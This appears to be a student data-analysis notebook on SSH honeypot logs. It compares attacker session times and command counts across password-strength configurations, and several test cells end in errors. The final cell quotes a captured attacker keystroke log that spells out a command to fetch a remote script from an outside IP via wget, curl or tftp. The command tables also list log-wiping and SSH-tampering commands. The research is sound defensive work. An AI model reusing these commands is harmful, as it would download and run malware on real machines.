<a href="https://colab.research.google.com/github/jonathan12932/ACES-Cybersecurity-Research/blob/main/1G_TheDefenders_HACS200_DataAnalysis.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Initialization

Mount your google drive with the CSV files or manually upload them.

In [ ]:
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


In [ ]:
from google.colab import files
uploaded = files.upload()

KeyboardInterrupt: 

Import the required libraries.

In [ ]:
!pip install scikit-posthocs

In [ ]:
import os
import zipfile
import re
from datetime import datetime

import pandas as pd
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import plotly.express as px

Read the CSV files.

In [ ]:
csv_directory = '/content/drive/MyDrive/y2s2/HACS200/data_csvs'
df = pd.read_csv(os.path.join(csv_directory, "cleaned.csv"))
dfa = pd.read_csv(os.path.join(csv_directory, "commands.csv"))
# Replace all NA password strength fields with "None"
df = df.fillna("None")
print(len(df), len(dfa))

23919 17505


# General Attacker Information

Unique Attackers (By Login)

In [ ]:
df_unq_l = df['IP'].value_counts()
len(df_unq_l.index)

3610

Unique Attackers (By Authentication IP)

Note: For some attackers the login IP and auth IP are different. (MITM Bug?)

In [ ]:
df_unq_a = df['Auth IP'].value_counts()
len(df_unq_a.index)

4459

Attackers per Honeypot

Note: More detailed information such as the IP of each Honeypot can be found in the honeypot itself

In [ ]:
df['HPt #'].value_counts()

,count
HPt #,
2,9018
3,4765
4,4070
5,3105
1,2961


Attackers per Config

In [ ]:
df['Pwd Str'].value_counts()

,count
Pwd Str,
Weak,6062
Medium,6045
High,5909
None,5903


Commands Run

Note: Checks for semicolons now

In [ ]:
sum_table = pd.DataFrame(dfa.sum()).T
sum_table.sort_values(by=0, axis=1)
sum_value = sum_table.sum()
sum_table

,Cmd #,uname -s -v -n -r -m,uname -a,sudo hive-passwd set ifjeeisurofmioufiose,sudo hive-passwd ifjeeisurofmioufiose,pkill Xorg,pkill x11vnc,pkill Hello,systemctl stop shellinabox,history -c,...,scp -t /tmp/b1qZzx22,scp -t /tmp/DAoN5OMj,scp -t /tmp/rlLUOWFC,cd ..,ls,cd Fak\t,scp -t /tmp/XqzbYEpf,scp -t /tmp/gXTniWht,scp -t /tmp/ZzKcobgk,scp -t /tmp/D4nvajwG
0,17684.0,7822.0,635.0,51.0,51.0,51.0,51.0,51.0,51.0,51.0,...,1.0,1.0,1.0,2.0,3.0,1.0,1.0,1.0,1.0,1.0


Common Commands Run (>1000 cmds)

In [ ]:
sum_table.loc[:, (sum_table >= 1000).all()]

,Cmd #,uname -s -v -n -r -m,cd ~,chattr -ia .ssh,lockr -ia .ssh
0,17684.0,7822.0,2580.0,2580.0,2580.0


CD Commands Run

In [ ]:
cd_list = [col for col in list(sum_table) if col.startswith('cd')]
sum_value_cd = sum_table[cd_list].sum()
sum_table[cd_list]

,cd ~,cd /tmp,cd /tmp/,cd /tmp || cd /var/run || cd /mnt || cd /root || cd /,cd ..,cd Fak\t
0,2580.0,0.0,1.0,0.0,2.0,1.0


Attacks per Unique IP

In [ ]:
df['IP'].value_counts()

,count
IP,
None,6576
200.105.141.150,2211
164.90.215.117,1995
85.192.56.68,875
92.255.85.107,635
...,...
65.20.172.194,1
73.85.163.164,1
171.241.32.116,1


Number of Bots (Attackers <2 secs)

In [ ]:
u2 = df[df["Time Logged In (s)"] <= 2]
print(len(u2))
print(sum_table["Cmd #"] / len(u2))

11169
0    1.583311
Name: Cmd #, dtype: float64


# Time Logged In as Dependant Variable

In [ ]:
import statsmodels.api as sm
import scikit_posthocs as skph
from statsmodels.stats.multicomp import pairwise_tukeyhsd
from statsmodels.formula.api import ols

AttributeError: partially initialized module 'patsy' has no attribute 'highlevel' (most likely due to a circular import)

## No Filter

Violin Plot for Time Spent

In [ ]:
df["Time Logged In (s)"] = pd.to_numeric(df["Time Logged In (s)"], errors='coerce')
df = df.dropna(subset=["Time Logged In (s)"])
fig1a = px.violin(
    df,
    y='Time Logged In (s)',
    x='Pwd Str',
    color='Pwd Str',
    box=True,
    points='all',
    category_orders={"Pwd Str": ["None", "Weak", "Medium", "High"]},
    title='Total Time Spent for All Attacks by Password Strength',
    labels={'Pwd Str': 'Password Strength', 'Time Logged In (s)': 'Time Logged In (s)'}
)
fig1a.show()

Remove attackers that made it to the time limit, 100s, before running stat tests. (ANOVA, Kruskal)

## No Attackers Reaching Time Limit

Violin for Time Spent (No Attackers Reaching Time Limit)

In [ ]:
# Remove attackers reaching time limit (100s)
df_f = df[df["Time Logged In (s)"] <= 100]
fig1b = px.violin(
    df_f,
    y='Time Logged In (s)',
    x='Pwd Str',
    color='Pwd Str',
    box=True,
    points='all',
    category_orders={"Pwd Str": ["None", "Weak", "Medium", "High"]},
    title='Total Time Spent for All Attacks by Password Strength (No Attackers Reaching Time Limit)',
    labels={'Pwd Str': 'Password Strength', 'Time Logged In (s)': 'Time Logged In (s)'}
)
fig1b.show()

ANOVA for Time Spent (No Attackers Reaching Time Limit)

In [ ]:
# Run ANOVA
f_statistic, p_value = sp.stats.f_oneway(df_f[df_f["Pwd Str"] == "None"]["Time Logged In (s)"],
                                         df_f[df_f["Pwd Str"] == "Weak"]["Time Logged In (s)"],
                                         df_f[df_f["Pwd Str"] == "Medium"]["Time Logged In (s)"],
                                         df_f[df_f["Pwd Str"] == "High"]["Time Logged In (s)"])
print("ANOVA Results for Time Spent (No Attackers Reaching Time Limit)")
print(f"f-statistic: {f_statistic:.4f}")
print(f"p-value: {p_value:.4f}")

# Run ANOVA using statsmodels
model = ols('Q("Time Logged In (s)") ~ C(Q("Pwd Str"))', data=df_f).fit()
anova_table = sm.stats.anova_lm(model, typ=2)
print("ANOVA Results for Time Spent (No Attackers Reaching Time Limit)")
print(anova_table)

p_value = anova_table["PR(>F)"].values[0]

# Run Tukey's HSD post-hoc test only if ANOVA's p-value is < 0.1
if p_value < 0.1:
    print("\nANOVA indicates a significant difference. Running Tukey's HSD post-hoc test...")
    tukey = pairwise_tukeyhsd(
        df["Time Logged In (s)"],
        df["Pwd Str"],
        alpha=0.1
    )
    print(tukey)
else:
    print("\nANOVA indicates no significant difference. No need for post-hoc analysis.")

ANOVA Results for Time Spent (No Attackers Reaching Time Limit)
f-statistic: 2.1108
p-value: 0.0965


NameError: name 'ols' is not defined

Kruskal Wallis for Time Spent (No Attackers Reaching Time Limit)

In [ ]:
# Run Kruskal Wallis
h_statistic, p_value = sp.stats.kruskal(df_f[df_f["Pwd Str"] == "None"]["Time Logged In (s)"],
                                        df_f[df_f["Pwd Str"] == "Weak"]["Time Logged In (s)"],
                                        df_f[df_f["Pwd Str"] == "Medium"]["Time Logged In (s)"],
                                        df_f[df_f["Pwd Str"] == "High"]["Time Logged In (s)"])
print("Kruskal Wallis Results for Time Spent (No Attackers Reaching Time Limit)")
print(f"h-statistic: {h_statistic:.4f}")
print(f"p-value: {p_value:.4f}")

# Run Dunn post-hoc test if Kruskal's p_value < 0.1
if p_value < 0.1:
  print("\nKruskal Wallis indicates a significant difference. Running Dunn post-hoc test...")
  dunn_value = skph.posthoc_dunn(
      df_f[['Pwd Str', 'Time Logged In (s)']],
      val_col='Time Logged In (s)',
      group_col='Pwd Str',
      p_adjust='bonferroni'
  )
  print(dunn_value)
else:
  print("\nKruskal Wallis indicates no significant difference. No need for post-hoc analysis.")

Kruskal Wallis Results for Time Spent (No Attackers Reaching Time Limit)
h-statistic: 3.4739
p-value: 0.3242

Kruskal Wallis indicates no significant difference. No need for post-hoc analysis.


## Only Unique Attackers + No Attackers Reaching Time Limit

Violin for Time Spent (Only Unique Attackers, No Attackers Reaching Time Limit)

In [ ]:
df_f = df.sort_values(by=['Login'])
df_f.drop_duplicates(subset='IP', keep='first', inplace=True)
df_f = df_f[df_f["Time Logged In (s)"] <= 100]
len(df_f)
fig1c = px.violin(
    df_f,
    y='Time Logged In (s)',
    x='Pwd Str',
    color='Pwd Str',
    box=True,
    points='all',
    category_orders={"Pwd Str": ["None", "Weak", "Medium", "High"]},
    title='Total Time Spent for All Attacks by Password Strength (No Atks Reaching Time Limit, Only Unique Atks)',
    labels={'Pwd Str': 'Password Strength', 'Time Logged In (s)': 'Time Logged In (s)'}
)
fig1c.show()

ANOVA for Time Spent (Only Unique Attackers, No Attackers Reaching Time Limit)

In [ ]:
# Run ANOVA
f_statistic, p_value = sp.stats.f_oneway(df_f[df_f["Pwd Str"] == "None"]["Time Logged In (s)"],
                                         df_f[df_f["Pwd Str"] == "Weak"]["Time Logged In (s)"],
                                         df_f[df_f["Pwd Str"] == "Medium"]["Time Logged In (s)"],
                                         df_f[df_f["Pwd Str"] == "High"]["Time Logged In (s)"])
print("ANOVA Results for Time Spent (Only Unique Attackers, No Attackers Reaching Time Limit)")
print(f"f-statistic: {f_statistic:.4f}")
print(f"p-value: {p_value:.4f}")

# Run ANOVA using statsmodels
model = ols('Q("Time Logged In (s)") ~ C(Q("Pwd Str"))', data=df_f).fit()
anova_table = sm.stats.anova_lm(model, typ=2)
print("ANOVA Results for Time Spent (Only Unique Attackers, No Attackers Reaching Time Limit)")
print(anova_table)

p_value = anova_table["PR(>F)"].values[0]

# Run Tukey's HSD post-hoc test only if ANOVA's p-value is < 0.1
if p_value < 0.1:
    print("\nANOVA indicates a significant difference. Running Tukey's HSD post-hoc test...")
    tukey = pairwise_tukeyhsd(
        df["Time Logged In (s)"],
        df["Pwd Str"],
        alpha=0.1
    )
    print(tukey)
else:
    print("\nANOVA indicates no significant difference. No need for post-hoc analysis.")

ANOVA Results for Time Spent (Only Unique Attackers, No Attackers Reaching Time Limit)
f-statistic: 0.7085
p-value: 0.5468


NameError: name 'ols' is not defined

Kruskal Wallis for Time Spent (Only Unique Attackers, No Attackers Reaching Time Limit)

In [ ]:
df_f = df_f[df_f["Time Logged In (s)"] != "None"]
h_statistic, p_value = sp.stats.kruskal(df_f[df_f["Pwd Str"] == "None"]["Time Logged In (s)"],
                                        df_f[df_f["Pwd Str"] == "Weak"]["Time Logged In (s)"],
                                        df_f[df_f["Pwd Str"] == "Medium"]["Time Logged In (s)"],
                                        df_f[df_f["Pwd Str"] == "High"]["Time Logged In (s)"])
print("Kruskal Wallis Results for Time Spent (Only Unique Attackers, No Attackers Reaching Time Limit)")
print(f"h-statistic: {h_statistic:.4f}")
print(f"p-value: {p_value:.4f}")

# Run Dunn post-hoc test if Kruskal's p_value < 0.1
if p_value < 0.1:
  print("\nKruskal Wallis indicates a significant difference. Running Dunn post-hoc test...")
  dunn_value = skph.posthoc_dunn(
      df_f[['Pwd Str', 'Time Logged In (s)']],
      val_col='Time Logged In (s)',
      group_col='Pwd Str',
      p_adjust='bonferroni'
  )
  print(dunn_value)
else:
  print("\nKruskal Wallis indicates no significant difference. No need for post-hoc analysis.")

Kruskal Wallis Results for Time Spent (Only Unique Attackers, No Attackers Reaching Time Limit)
h-statistic: 8.0783
p-value: 0.0444

Kruskal Wallis indicates a significant difference. Running Dunn post-hoc test...


NameError: name 'skph' is not defined

# Commands Run as Dependent Varaiable

## No Filter

Violin Plot for Commands Run

In [ ]:
df["Cmd #"] = pd.to_numeric(df["Cmd #"], errors='coerce')
df = df.dropna(subset=["Cmd #"])
fig2a = px.violin(
    df,
    y='Cmd #',
    x='Pwd Str',
    color='Pwd Str',
    box=True,
    points='all',
    category_orders={"Pwd Str": ["None", "Weak", "Medium", "High"]},
    title='Number of Commands Run for All Attacks by Password Strength',
    labels={'Pwd Str': 'Password Strength', 'Cmd #': 'Number of Commands Run'}
)
fig2a.show()

ANOVA for Commands Run

In [ ]:
# Run ANOVA
f_statistic, p_value = sp.stats.f_oneway(df[df["Pwd Str"] == "None"]["Cmd #"],
                                         df[df["Pwd Str"] == "Weak"]["Cmd #"],
                                         df[df["Pwd Str"] == "Medium"]["Cmd #"],
                                         df[df["Pwd Str"] == "High"]["Cmd #"])
print("ANOVA Results for Commands Run")
print(f"f-statistic: {f_statistic:.4f}")
print(f"p-value: {p_value:.4f}")

# Run ANOVA using statsmodels
model = ols('Q("Cmd #") ~ C(Q("Pwd Str"))', data=df).fit()
anova_table = sm.stats.anova_lm(model, typ=2)
print("ANOVA Results for Commands Run")
print(anova_table)

p_value = anova_table["PR(>F)"].values[0]

# Run Tukey's HSD post-hoc test only if ANOVA's p-value is < 0.1
if p_value < 0.1:
    print("\nANOVA indicates a significant difference. Running Tukey's HSD post-hoc test...")
    tukey = pairwise_tukeyhsd(
        df["Cmd #"],
        df["Pwd Str"],
        alpha=0.1
    )
    print(tukey)
else:
    print("\nANOVA indicates no significant difference. No need for post-hoc analysis.")

ANOVA Results for Commands Run
f-statistic: 3.7582
p-value: 0.0103


NameError: name 'ols' is not defined

Kruskal Wallis for Commands Run

In [ ]:
# Run Kruskal Wallis
h_statistic, p_value = sp.stats.kruskal(df[df["Pwd Str"] == "None"]["Cmd #"],
                                        df[df["Pwd Str"] == "Weak"]["Cmd #"],
                                        df[df["Pwd Str"] == "Medium"]["Cmd #"],
                                        df[df["Pwd Str"] == "High"]["Cmd #"])
print("Kruskal Wallis Results for Commands Run")
print(f"h-statistic: {h_statistic:.4f}")
print(f"p-value: {p_value:.4f}")

# Run Dunn post-hoc test if Kruskal's p_value < 0.1
if p_value < 0.1:
  print("\nKruskal Wallis indicates a significant difference. Running Dunn post-hoc test...")
  dunn_value = skph.posthoc_dunn(
      df[['Pwd Str', 'Cmd #']],
      val_col='Cmd #',
      group_col='Pwd Str',
      p_adjust='bonferroni'
  )
  print(dunn_value)
else:
  print("\nKruskal Wallis indicates no significant difference. No need for post-hoc analysis.")

Kruskal Wallis Results for Commands Run
h-statistic: 9.1745
p-value: 0.0271

Kruskal Wallis indicates a significant difference. Running Dunn post-hoc test...


NameError: name 'skph' is not defined

## Only Unique Attackers

Violin Plot for Commands Run (Only Unique Attackers)

In [ ]:
df_f = df.sort_values(by=['Login'])
df_f.drop_duplicates(subset='IP', keep='first', inplace=True)
fig2b = px.violin(
    df_f,
    y='Cmd #',
    x='Pwd Str',
    color='Pwd Str',
    box=True,
    points='all',
    category_orders={"Pwd Str": ["None", "Weak", "Medium", "High"]},
    title='Number of Commands Run for All Attacks by Password Strength (Only Unique Attackers)',
    labels={'Pwd Str': 'Password Strength', 'Cmd #': 'Number of Commands Run'}
)
fig2b.show()

ANOVA for Commands Run (Only Unique Attackers)

In [ ]:
# Run ANOVA
f_statistic, p_value = sp.stats.f_oneway(df_f[df_f["Pwd Str"] == "None"]["Cmd #"],
                                         df_f[df_f["Pwd Str"] == "Weak"]["Cmd #"],
                                         df_f[df_f["Pwd Str"] == "Medium"]["Cmd #"],
                                         df_f[df_f["Pwd Str"] == "High"]["Cmd #"])
print("ANOVA Results for Commands Run (Only Unique Attackers)")
print(f"f-statistic: {f_statistic:.4f}")
print(f"p-value: {p_value:.4f}")

# Run ANOVA using statsmodels
model = ols('Q("Cmd #") ~ C(Q("Pwd Str"))', data=df_f).fit()
anova_table = sm.stats.anova_lm(model, typ=2)
print("ANOVA Results for Commands Run")
print(anova_table)

p_value = anova_table["PR(>F)"].values[0]

# Run Tukey's HSD post-hoc test only if ANOVA's p-value is < 0.1
if p_value < 0.1:
    print("\nANOVA indicates a significant difference. Running Tukey's HSD post-hoc test...")
    tukey = pairwise_tukeyhsd(
        df_f["Cmd #"],
        df_f["Pwd Str"],
        alpha=0.1
    )
    print(tukey)
else:
    print("\nANOVA indicates no significant difference. No need for post-hoc analysis.")

ANOVA Results for Commands Run (Only Unique Attackers)
f-statistic: 6.3399
p-value: 0.0003


NameError: name 'ols' is not defined

Kruskal Wallis for Commands Run (Only Unique Attackers)

In [ ]:
# Run Kruskal Wallis
h_statistic, p_value = sp.stats.kruskal(df_f[df_f["Pwd Str"] == "None"]["Cmd #"],
                                        df_f[df_f["Pwd Str"] == "Weak"]["Cmd #"],
                                        df_f[df_f["Pwd Str"] == "Medium"]["Cmd #"],
                                        df_f[df_f["Pwd Str"] == "High"]["Cmd #"])
print("Kruskal Wallis Results for Commands Run")
print(f"h-statistic: {h_statistic:.4f}")
print(f"p-value: {p_value:.4f}")

# Run Dunn post-hoc test if Kruskal's p_value < 0.1
if p_value < 0.1:
  print("\nKruskal Wallis indicates a significant difference. Running Dunn post-hoc test...")
  dunn_value = skph.posthoc_dunn(
      df_f[['Pwd Str', 'Cmd #']],
      val_col='Cmd #',
      group_col='Pwd Str',
      p_adjust='bonferroni'
  )
  print(dunn_value)
else:
  print("\nKruskal Wallis indicates no significant difference. No need for post-hoc analysis.")

Kruskal Wallis Results for Commands Run
h-statistic: 18.5807
p-value: 0.0003

Kruskal Wallis indicates a significant difference. Running Dunn post-hoc test...


NameError: name 'skph' is not defined

# Testing

Used to testing contents of dataframes

In [ ]:
# We have 2 attackers that ran over 10 commands in their first instance
# Interactive commands run are shown below
# Most is bot activity and they are connected for <1s
df_f[df_f["Cmd #"] >= 10]
# df[df["Cmd #"] >= 10]

,HPt #,Pwd Str,Atk #,Login,IP,ID,Logout,Auth #,Auth Start,Auth End,Auth IP,Cmd #,Time Logged In (s),Time Auth (s),Total Time (s)
606,2,Medium,55,2024-10-25 00:18:27.132,87.120.117.228,2024_10_25_00_18_27_132,2024-10-25 00:18:27.762,1,2024-10-25 00:18:26.302,2024-10-25 00:18:26.302,87.120.117.228,12.0,0.63,0.0,1.46
8435,2,Weak,2497,2024-11-03 11:09:33.203,141.98.11.167,2024_11_03_11_09_33_203,2024-11-03 11:10:04.783,1,2024-11-03 11:09:32.989,2024-11-03 11:09:32.989,141.98.11.167,14.0,31.58,0.0,31.794


In [ ]:
# Interactive commands run by user who ran 14 cmds is shown below
'''
2024-11-03 11:09:33.938 [Keystroke] e - 101
2024-11-03 11:09:33.938 [Keystroke] n - 110
2024-11-03 11:09:33.938 [Keystroke] a - 97
2024-11-03 11:09:33.938 [Keystroke] b - 98
2024-11-03 11:09:33.938 [Keystroke] l - 108
2024-11-03 11:09:33.938 [Keystroke] e - 101
2024-11-03 11:09:33.938 [Keystroke] [LF] - 10
2024-11-03 11:09:33.941 [Full Line Parsed] enable
2024-11-03 11:09:34.055 [Keystroke] s - 115
2024-11-03 11:09:34.055 [Keystroke] y - 121
2024-11-03 11:09:34.055 [Keystroke] s - 115
2024-11-03 11:09:34.055 [Keystroke] t - 116
2024-11-03 11:09:34.055 [Keystroke] e - 101
2024-11-03 11:09:34.055 [Keystroke] m - 109
2024-11-03 11:09:34.055 [Keystroke] [LF] - 10
2024-11-03 11:09:34.057 [Full Line Parsed] system
2024-11-03 11:09:34.059 [Keystroke] s - 115
2024-11-03 11:09:34.059 [Keystroke] h - 104
2024-11-03 11:09:34.059 [Keystroke] e - 101
2024-11-03 11:09:34.059 [Keystroke] l - 108
2024-11-03 11:09:34.059 [Keystroke] l - 108
2024-11-03 11:09:34.059 [Keystroke] [LF] - 10
2024-11-03 11:09:34.060 [Full Line Parsed] shell
2024-11-03 11:09:34.061 [Keystroke] s - 115
2024-11-03 11:09:34.061 [Keystroke] h - 104
2024-11-03 11:09:34.061 [Keystroke] [LF] - 10
2024-11-03 11:09:34.062 [Full Line Parsed] sh
2024-11-03 11:09:34.062 [Keystroke] l - 108
2024-11-03 11:09:34.062 [Keystroke] i - 105
2024-11-03 11:09:34.062 [Keystroke] n - 110
2024-11-03 11:09:34.062 [Keystroke] u - 117
2024-11-03 11:09:34.062 [Keystroke] x - 120
2024-11-03 11:09:34.062 [Keystroke] s - 115
2024-11-03 11:09:34.062 [Keystroke] h - 104
2024-11-03 11:09:34.062 [Keystroke] e - 101
2024-11-03 11:09:34.062 [Keystroke] l - 108
2024-11-03 11:09:34.062 [Keystroke] l - 108
2024-11-03 11:09:34.062 [Keystroke] [LF] - 10
2024-11-03 11:09:34.063 [Full Line Parsed] linuxshell
2024-11-03 11:09:34.063 [Keystroke] c - 99
2024-11-03 11:09:34.063 [Keystroke] d - 100
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] / - 47
2024-11-03 11:09:34.063 [Keystroke] t - 116
2024-11-03 11:09:34.063 [Keystroke] m - 109
2024-11-03 11:09:34.063 [Keystroke] p - 112
2024-11-03 11:09:34.063 [Keystroke] / - 47
2024-11-03 11:09:34.063 [Keystroke] ; - 59
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] e - 101
2024-11-03 11:09:34.063 [Keystroke] c - 99
2024-11-03 11:09:34.063 [Keystroke] h - 104
2024-11-03 11:09:34.063 [Keystroke] o - 111
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] " - 34
2024-11-03 11:09:34.063 [Keystroke] s - 115
2024-11-03 11:09:34.063 [Keystroke] e - 101
2024-11-03 11:09:34.063 [Keystroke] n - 110
2024-11-03 11:09:34.063 [Keystroke] p - 112
2024-11-03 11:09:34.063 [Keystroke] a - 97
2024-11-03 11:09:34.063 [Keystroke] i - 105
2024-11-03 11:09:34.063 [Keystroke] " - 34
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] > - 62
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] r - 114
2024-11-03 11:09:34.063 [Keystroke] o - 111
2024-11-03 11:09:34.063 [Keystroke] o - 111
2024-11-03 11:09:34.063 [Keystroke] t - 116
2024-11-03 11:09:34.063 [Keystroke] s - 115
2024-11-03 11:09:34.063 [Keystroke] e - 101
2024-11-03 11:09:34.063 [Keystroke] n - 110
2024-11-03 11:09:34.063 [Keystroke] p - 112
2024-11-03 11:09:34.063 [Keystroke] a - 97
2024-11-03 11:09:34.063 [Keystroke] i - 105
2024-11-03 11:09:34.063 [Keystroke] ; - 59
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] c - 99
2024-11-03 11:09:34.063 [Keystroke] a - 97
2024-11-03 11:09:34.063 [Keystroke] t - 116
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] r - 114
2024-11-03 11:09:34.063 [Keystroke] o - 111
2024-11-03 11:09:34.063 [Keystroke] o - 111
2024-11-03 11:09:34.063 [Keystroke] t - 116
2024-11-03 11:09:34.063 [Keystroke] s - 115
2024-11-03 11:09:34.063 [Keystroke] e - 101
2024-11-03 11:09:34.063 [Keystroke] n - 110
2024-11-03 11:09:34.063 [Keystroke] p - 112
2024-11-03 11:09:34.063 [Keystroke] a - 97
2024-11-03 11:09:34.063 [Keystroke] i - 105
2024-11-03 11:09:34.063 [Keystroke] ; - 59
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] r - 114
2024-11-03 11:09:34.063 [Keystroke] m - 109
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] - - 45
2024-11-03 11:09:34.063 [Keystroke] r - 114
2024-11-03 11:09:34.063 [Keystroke] f - 102
2024-11-03 11:09:34.063 [Keystroke] [Space] - 32
2024-11-03 11:09:34.063 [Keystroke] r - 114
2024-11-03 11:09:34.063 [Keystroke] o - 111
2024-11-03 11:09:34.063 [Keystroke] o - 111
2024-11-03 11:09:34.063 [Keystroke] t - 116
2024-11-03 11:09:34.063 [Keystroke] s - 115
2024-11-03 11:09:34.063 [Keystroke] e - 101
2024-11-03 11:09:34.063 [Keystroke] n - 110
2024-11-03 11:09:34.063 [Keystroke] p - 112
2024-11-03 11:09:34.063 [Keystroke] a - 97
2024-11-03 11:09:34.063 [Keystroke] i - 105
2024-11-03 11:09:34.063 [Keystroke] [LF] - 10
2024-11-03 11:09:34.068 [Full Line Parsed] cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai
2024-11-03 11:09:34.276 [Keystroke] r - 114
2024-11-03 11:09:34.276 [Keystroke] m - 109
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] - - 45
2024-11-03 11:09:34.276 [Keystroke] r - 114
2024-11-03 11:09:34.276 [Keystroke] f - 102
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] ; - 59
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] w - 119
2024-11-03 11:09:34.276 [Keystroke] g - 103
2024-11-03 11:09:34.276 [Keystroke] e - 101
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] p - 112
2024-11-03 11:09:34.276 [Keystroke] : - 58
2024-11-03 11:09:34.276 [Keystroke] / - 47
2024-11-03 11:09:34.276 [Keystroke] / - 47
2024-11-03 11:09:34.276 [Keystroke] 9 - 57
2024-11-03 11:09:34.276 [Keystroke] 3 - 51
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 2 - 50
2024-11-03 11:09:34.276 [Keystroke] 3 - 51
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 0 - 48
2024-11-03 11:09:34.276 [Keystroke] 9 - 57
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 7 - 55
2024-11-03 11:09:34.276 [Keystroke] 0 - 48
2024-11-03 11:09:34.276 [Keystroke] / - 47
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] | - 124
2024-11-03 11:09:34.276 [Keystroke] | - 124
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] c - 99
2024-11-03 11:09:34.276 [Keystroke] u - 117
2024-11-03 11:09:34.276 [Keystroke] r - 114
2024-11-03 11:09:34.276 [Keystroke] l - 108
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] - - 45
2024-11-03 11:09:34.276 [Keystroke] O - 79
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] p - 112
2024-11-03 11:09:34.276 [Keystroke] : - 58
2024-11-03 11:09:34.276 [Keystroke] / - 47
2024-11-03 11:09:34.276 [Keystroke] / - 47
2024-11-03 11:09:34.276 [Keystroke] 9 - 57
2024-11-03 11:09:34.276 [Keystroke] 3 - 51
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 2 - 50
2024-11-03 11:09:34.276 [Keystroke] 3 - 51
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 0 - 48
2024-11-03 11:09:34.276 [Keystroke] 9 - 57
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 7 - 55
2024-11-03 11:09:34.276 [Keystroke] 0 - 48
2024-11-03 11:09:34.276 [Keystroke] / - 47
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] | - 124
2024-11-03 11:09:34.276 [Keystroke] | - 124
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] f - 102
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] p - 112
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] 9 - 57
2024-11-03 11:09:34.276 [Keystroke] 3 - 51
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 2 - 50
2024-11-03 11:09:34.276 [Keystroke] 3 - 51
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 0 - 48
2024-11-03 11:09:34.276 [Keystroke] 9 - 57
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 7 - 55
2024-11-03 11:09:34.276 [Keystroke] 0 - 48
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] - - 45
2024-11-03 11:09:34.276 [Keystroke] c - 99
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] g - 103
2024-11-03 11:09:34.276 [Keystroke] e - 101
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
